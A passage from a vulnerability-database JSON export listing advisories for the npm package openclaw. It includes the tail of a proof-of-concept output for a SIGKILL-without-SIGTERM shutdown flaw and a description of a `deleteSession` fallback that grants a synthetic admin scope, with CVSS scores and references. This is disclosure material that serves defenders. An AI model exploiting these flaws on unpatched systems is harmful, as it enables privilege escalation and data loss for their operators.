Flag: GRACEFUL_SHUTDOWN\n\n[NORMAL] Control confirmed: patched killProcessTree sends SIGTERM first,\n         allowing graceful shutdown before escalating to SIGKILL.\n```\n\n### Impact\nWhen `!stop` is used, background processes are killed instantly via `SIGKILL` with no chance to perform cleanup. This can result in:\n\n- **Data corruption**: processes writing to files or databases are interrupted mid-write\n- **Resource leaks**: temporary files, lock files, and network connections are not properly released\n- **Security-sensitive cleanup skipped**: operations like erasing in-memory secrets or completing audit logs are bypassed\n\nThis is the same class of impact that CVE-2026-27486 was filed for — the fix simply missed the `shell-utils.ts` copy of the function.\n\n### Affected products\n- **Ecosystem**: npm\n- **Package name**: openclaw\n- **Affected versions**: <= 2026.3.14\n- **Patched versions**: <None> (as originally reported; the note at the top of this advisory gives 2026.3.24 as the fixed release)\n\n### Severity\n- **Severity**: Medium\n- **Vector string**: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H\n\n### Weaknesses\n- **CWE**: CWE-404: Improper Resource Shutdown or Release\n\n### Occurrences\n\n| Permalink | Description |\n| :--- | :--- |\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/agents/shell-utils.ts#L170-L192](https://github.com/moltbot/moltbot/blob/f2849c2417/src/agents/shell-utils.ts#L170-L192) | The vulnerable `killProcessTree` function that sends immediate `SIGKILL` without `SIGTERM`. |\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L5](https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L5) | Import statement pulling the vulnerable `killProcessTree` from `shell-utils.ts` instead of the patched `kill-tree.ts`. 
|\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L300-L304](https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L300-L304) | The `!stop` handler calling the vulnerable `killProcessTree(pid)`. |\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/process/kill-tree.ts#L46-L78](https://github.com/moltbot/moltbot/blob/f2849c2417/src/process/kill-tree.ts#L46-L78) | The **patched** `killProcessTreeUnix` with graceful `SIGTERM` → grace period → `SIGKILL` sequence (for reference). |",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35667",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00017",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04185",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00017",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04174",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35667"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3298-56p6-rpw2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:31Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3298-56p6-rpw2"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35667",
                    "reference_id": "CVE-2026-35667",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35667"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3298-56p6-rpw2",
                    "reference_id": "GHSA-3298-56p6-rpw2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3298-56p6-rpw2"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-jfv4-h8mc-jcp8",
                    "reference_id": "GHSA-jfv4-h8mc-jcp8",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-jfv4-h8mc-jcp8"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-improper-process-termination-via-unpatched-killprocesstree-in-shell-utils-ts",
                    "reference_id": "openclaw-improper-process-termination-via-unpatched-killprocesstree-in-shell-utils-ts",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:31Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-improper-process-termination-via-unpatched-killprocesstree-in-shell-utils-ts"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.24",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5dj5-mk23-kyds"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-66nc-bn98-nbas"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-acy1-83py-efhr"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-utv2-tyje-kfht"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vv2u-u7mn-rfe1"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"
                }
            ],
            "aliases": [
                "CVE-2026-35667",
                "GHSA-3298-56p6-rpw2"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cvxu-rdbu-abd2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91353?format=api",
            "vulnerability_id": "VCID-cwd3-ecym-sfaw",
            "summary": "OpenClaw: Gateway Plugin Subagent Fallback `deleteSession` Uses Synthetic `operator.admin`\n## Summary\n\nGateway Plugin Subagent Fallback `deleteSession` Uses Synthetic `operator.admin`\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nGateway plugin subagent fallback `deleteSession` previously dispatched `sessions.delete` with a synthetic `operator.admin` runtime scope when no request-scoped client existed. Commit `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7` binds deletion to the caller scope instead of minting admin scope.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7`.\n\n## Fix Commit(s)\n\n- `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7`",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35645",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15986",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1603",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1604",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35645"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:11:49Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h4jx-hjr3-fhgc",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:11:49Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h4jx-hjr3-fhgc"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35645",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35645"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-synthetic-operator-admin-in-deletesession",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:11:49Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-synthetic-operator-admin-in-deletesession"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-h4jx-hjr3-fhgc",
                    "reference_id": "GHSA-h4jx-hjr3-fhgc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-h4jx-hjr3-fhgc"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
